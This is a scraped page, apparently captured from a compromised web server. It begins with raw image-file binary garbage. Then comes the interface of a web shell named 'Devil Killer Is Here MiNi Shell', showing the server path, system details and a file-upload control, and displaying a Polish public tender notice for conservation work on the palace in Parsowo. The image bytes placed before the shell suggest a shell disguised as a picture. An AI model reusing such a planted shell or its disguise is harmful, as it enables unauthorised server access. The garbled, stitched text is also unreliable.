JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240723/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240723/0042610901-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> PRACE KONSERWATORSKIE BUDYNKU PAŁACOWEGO W PARSOWIE </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">DOM POMOCY SPOŁECZNEJ IM. ANSELMA ALOJZEGO MŁODZIKA W PARSOWIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 362232299</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">25</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Parsowo</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-039</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(94) 31-80-359</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dps.parsowo@powiat.koszalin.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">dps.parsowo.ibip.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> POMOC SPOŁECZNA </p> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">CENTRUM USŁUG WSPÓLNYCH POWIATU KOSZALIŃSKIEGO</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">523431235</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">ul. Racławicka 13</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Koszalin</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">75-620</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">/ 94/ 71 40 271</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">cuw@powiat.koszalin.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">https://cuwkoszalin.bip.gov.pl/</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PRACE KONSERWATORSKIE BUDYNKU PAŁACOWEGO W PARSOWIE </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3a649984-85a7-4d0c-832c-a180978bf0dd</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00426109</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-07-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00037049/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 PRACE KONSERWATORSKIE W BUDYNKU PAŁACOWYM W PARSOWIE</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/cuwkoszalin <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Pełnomocnikiem zamawiającego a Wykonawcą w niniejszym<br/>postępowaniu o udzielenie zamówienia, odbywa się w języku polskim za pośrednictwem Platformy zakupowej tj.:<br/>platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/cuwkoszalin<br/>Pełnomocnik zamawiającego dopuszcza opcjonalnie komunikację za pośrednictwem poczty elektronicznej: adres poczty<br/>elektronicznej Pełnomocnika zamawiającego: elzbieta.marchlewska@powiat.koszalin.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Informacje o wymaganiach<br/>technicznych i organizacyjnych dotyczące korespondencji elektronicznej opisane zostały w:<br/>- Regulaminie Platformy i Instrukcjach korzystania z Platformy dostępnych pod adresem: platformazakupowa.pl w zakładkach<br/>„Regulamin” i „Instrukcje” oraz<br/>- w Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania. (Rozdział XV)</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia tj. w<br/>Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający realizuje obowiązek informacyjny w dokumentach zamówienia tj. w<br/>Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP.26.01.2024.EM</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia dotyczy prac konserwatorskich budynku pałacowego w Parsowie– siedziby Domu Pomocy Społecznej im. Anselma Alojzego Młodzika w Parsowie.<br/><br/>Zakres robót do wykonania obejmuje w między innymi następujące punkty:<br/>a) Prace zrealizowane w całości, zgodnie z dokumentacją MKPA, 2024, dotyczące strefy nad cokołowej;<br/>b) Prace zrealizowane wycinkowo, zgodnie z dokumentacją MKPA, 2024 , dotyczące fragmentu izolacji fundamentów;<br/>c) Prace zrealizowane wycinkowo, zgodnie z dokumentacją Kocur, 2022 dotyczące tarasów.<br/><br/>Szczegółowe określenie zakresu i ilości robót objętych przedmiotem zamówienia zawarte jest w przedmiarach robót,<br/>dokumentacjach projektowych, Specyfikacjach Technicznych Wykonania i Odbioru Robót /załącznik nr 6 do SWZ/. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45443000-4 - Roboty elewacyjne</p> <p class="mb-0">45453000-7 - Roboty remontowe i renowacyjne</p> <p class="mb-0">45454000-4 - Roboty restrukturyzacyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">355 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny oferty został zawarty w rozdziale XXVIII Specyfikacji Warunków Zamówienia dotyczącej<br/>prowadzonego postępowania</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Zgodnie z art. 57 pkt 2 ustawy Pzp o udzielenie zamówienia określonego w niniejszym postępowaniu mogą ubiegać się<br/>Wykonawcy, którzy spełniają następujące WARUNKI UDZIAŁU W POSTĘPOWANIU określone przez Zamawiającego<br/>dotyczące:<br/><br/>1) zdolności do występowania w obrocie gospodarczym<br/>Zamawiający nie określa warunków w tym zakresie<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów<br/>Zamawiający nie określa warunków w tym zakresie<br/><br/>3) sytuacji ekonomicznej lub finansowej<br/>W celu wykazania spełniania warunku Wykonawca winien przez cały okres realizacji przedmiotu zamówienia posiadać<br/>ubezpieczenie od odpowiedzialności cywilnej kontraktowej, na sumę gwarancyjną min. 500 000,00 PLN obejmujące swoim<br/>zakresem w szczególności:<br/>a) odpowiedzialność za szkody wyrządzone w mieniu przyjętym w celu wykonania przedmiotu zamówienia, tj. w mieniu<br/>powierzonym z min. sumą gwarancyjną w tym zakresie 500 000,00 PLN,<br/>b) odpowiedzialność za szkody w mieniu lub na osobie wyrządzone przez Wykonawcę lub podwykonawców w trakcie<br/>realizacji przedmiotu zamówienia z min. sumą gwarancyjną w tym zakresie 200 000,00 PLN.<br/><br/>4) zdolności technicznej lub zawodowej<br/>1. Zamawiający wymaga aby Wykonawca posiadał niezbędną wiedzę i doświadczenie do wykonania przedmiotu<br/>zamówienia w szczególności potwierdził, że:<br/>a) w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną odpowiadającą swoim<br/>rodzajem robotom budowlanym stanowiącym przedmiot zamówienia, o wartości minimum 300 000 zł. brutto lub<br/>b) w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wykonał należycie dwie roboty budowlane odpowiadające swoim rodzajem robotom<br/>budowlanym stanowiącym przedmiot zamówienia, o łącznej wartości minimum 300 000 zł. brutto. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga od<br/>Wykonawcy złożenia w niniejszym postępowaniu podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu:<br/><br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty:<br/>1. OŚWIADCZENIE SKŁADANE NA PODSTAWIE ART. 117 UST. 4 USTAWY PZP /jeżeli dotyczy/, z którego wynika, które roboty<br/>budowlane lub usługi wykonają poszczególni Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, sporządzone<br/>odpowiednio na/wg załącznika nr 5 do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/><br/>Wykonawca który polega na zasobach innych podmiotów dołącza odpowiednio do oferty:<br/>1. ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY SKŁADANE NA PODSTAWIE ART. 118 USTAWY PZP /jeżeli<br/>dotyczy/, potwierdzające, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami innych podmiotów.<br/><br/>Zamawiający w celu potwierdzenia spełnienia warunków udziału w postępowaniu, zgodnie z art. 274 ust. 1 ustawy Pzp przed<br/>wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym<br/>terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych aktualnych na<br/>dzień złożenia:<br/>1. wykazu robót budowlanych wykonanych<br/>a. w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wykonał należycie co najmniej jedną robotę budowlaną odpowiadającą swoim rodzajem robotom<br/>budowlanym stanowiącym przedmiot zamówienia, o wartości minimum 300 000 zł. brutto lub<br/>b. w okresie ostatnich 5 lat licząc wstecz od dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia działalności jest<br/>krótszy - w tym okresie, wykonał należycie dwie roboty budowlane odpowiadające swoim rodzajem robotom budowlanym<br/>stanowiącym przedmiot zamówienia, o łącznej wartości minimum 300 000 zł. brutto.<br/>wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa,<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli<br/>wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty.<br/>2. Wykazu dysponowania osobami:<br/>Wykonawca musi zapewnić kierownika budowy posiadającego kwalifikacje i doświadczenie zawodowe określone w art. 37 c ustawy<br/>z dnia 23.07.2003 r. o ochronie i opiece nad zabytkami (Dz. U. z 2022 r. poz. 840 ze zm.) i potwierdzić jego kwalifikacje<br/>zawodowych, uprawnienia, itp.<br/>3. Dokumentów potwierdzających, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej kontraktowej, na sumę<br/>gwarancyjną min. 500 000,00 PLN obejmujące swoim zakresem w szczególności:<br/>a. odpowiedzialność za szkody wyrządzone w mieniu przyjętym w celu wykonania przedmiotu zamówienia, tj. w mieniu powierzonym<br/>z min. sumą gwarancyjną w tym zakresie 500 000,00 PLN,<br/>b. odpowiedzialność za szkody w mieniu lub na osobie wyrządzone przez Wykonawcę lub podwykonawców w trakcie realizacji<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>przedmiotu zamówienia z min. sumą gwarancyjną w tym zakresie 200 000,00 PLN.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga od Wykonawcy złożenia w niniejszym postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> WRAZ Z OFERTĄ NALEŻY PRZEKAZAĆ/ZŁOŻYĆ:<br/><br/>1) OŚWIADCZENIE WYKONAWCY, o którym mowa w art. 125 ust. 1 ustawy Pzp O NIEPODLEGANIU WYKLUCZENIU I<br/>SPEŁNIANIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU, w zakresie wskazanym przez Zamawiającego sporządzone<br/>odpowiednio na/wg załącznika nr 3 do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/><br/>2) w celu potwierdzenia, że osoba działająca w imieniu Wykonawcy, Wykonawcy wspólnie ubiegającego się o udzielenie<br/>zamówienia lub podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp, jest umocowana do<br/>reprezentowania odpowiednio Wykonawcy, Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia lub podmiotu<br/>udostępniającego zasoby:<br/>a) ODPIS LUB INFORMACJĘ Z KRAJOWEGO REJESTRU SĄDOWEGO LUB CENTRALNEJ EWIDENCJI I INFORMACJI<br/>O DZIAŁALNOŚCI GOSPODARCZEJ LUB Z INNEGO WŁAŚCIWEGO REJESTRU POTWIERDZAJĄCE UMOCOWANIE<br/>DO REPREZENTOWANIA odpowiednio Wykonawcy, Wykonawcy wspólnie ubiegającego się o udzielenie zamówienia<br/>publicznego, podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp /jeżeli występuje/<br/>wystawiony przez upoważniony podmiot inny niż Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie<br/>zamówienia publicznego, podmiot udostępniający zasoby;<br/>b) PEŁNOMOCNICTWO /jeżeli występuje/ wystawione przez Wykonawcę, Wykonawcę wspólnie ubiegającego się o<br/>udzielenie zamówienia lub podmiot udostępniający zasoby;<br/>c) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia PEŁNOMOCNICTWO lub INNY<br/>DOKUMENT podpisany przez każdego z Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z którego<br/>stosownie do treści art. 58 ust. 2 ustawy Pzp wynika ustanowienie pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/><br/>3)Jeżeli Wykonawca w celu potwierdzenia spełniania warunków udziału w postępowaniu polega na zasobach innych<br/>podmiotów na zasadach określonych w art. 118 ustawy Pzp, Wykonawca musi przekazać/złożyć wraz z ofertą poza<br/>ZOBOWIĄZANIEM PODMIOTU UDOSTĘPNIAJĄCEGO WYKONAWCY SWOJE ZASOBY również<br/>a) OŚWIADCZENIE PODMIOTU UDOSTĘPNIAJĄCEGO WYKONAWCY SWOJE ZASOBY, o którym mowa w art. 125<br/>ust.5 ustawy Pzp, O NIEPODLEGANIU WYKLUCZENIU I SPEŁNIANIU WARUNKÓW UDZIAŁU W POSTĘPOWANIU,<br/>sporządzone na/wg załącznika nr 3a do Specyfikacji Warunków Zamówienia dotyczącej prowadzonego postępowania.<br/>DOKUMENTY PODMIOTÓW ZAGRANICZNYCH: Wykonawca mający siedzibę lub miejsce zamieszkania poza granicami<br/>Rzeczypospolitej Polskiej, składa w niniejszym postępowaniu wraz z ofertą takie same dokumenty/oświadczenia jak<br/>Wykonawca polski (oświadczenia/dokumenty wymienione powyżej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Przepisy ustawy Pzp oraz zapisy Specyfikacji Warunków Zamówienia dotyczące Wykonawcy stosuje się odpowiednio do<br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>WYMAGANIA DOTYCZĄCE SKŁADANIA OFERTY PRZEZ WYKONAWCÓW WSPÓLNIE UBIEGAJĄCYCH SIĘ O<br/>UDZIELENIE ZAMÓWIENIA (np. spółka cywilna, konsorcjum):<br/>1) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są stosownie do treści art. 58 ust. 2 ustawy<br/>Pzp, ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do 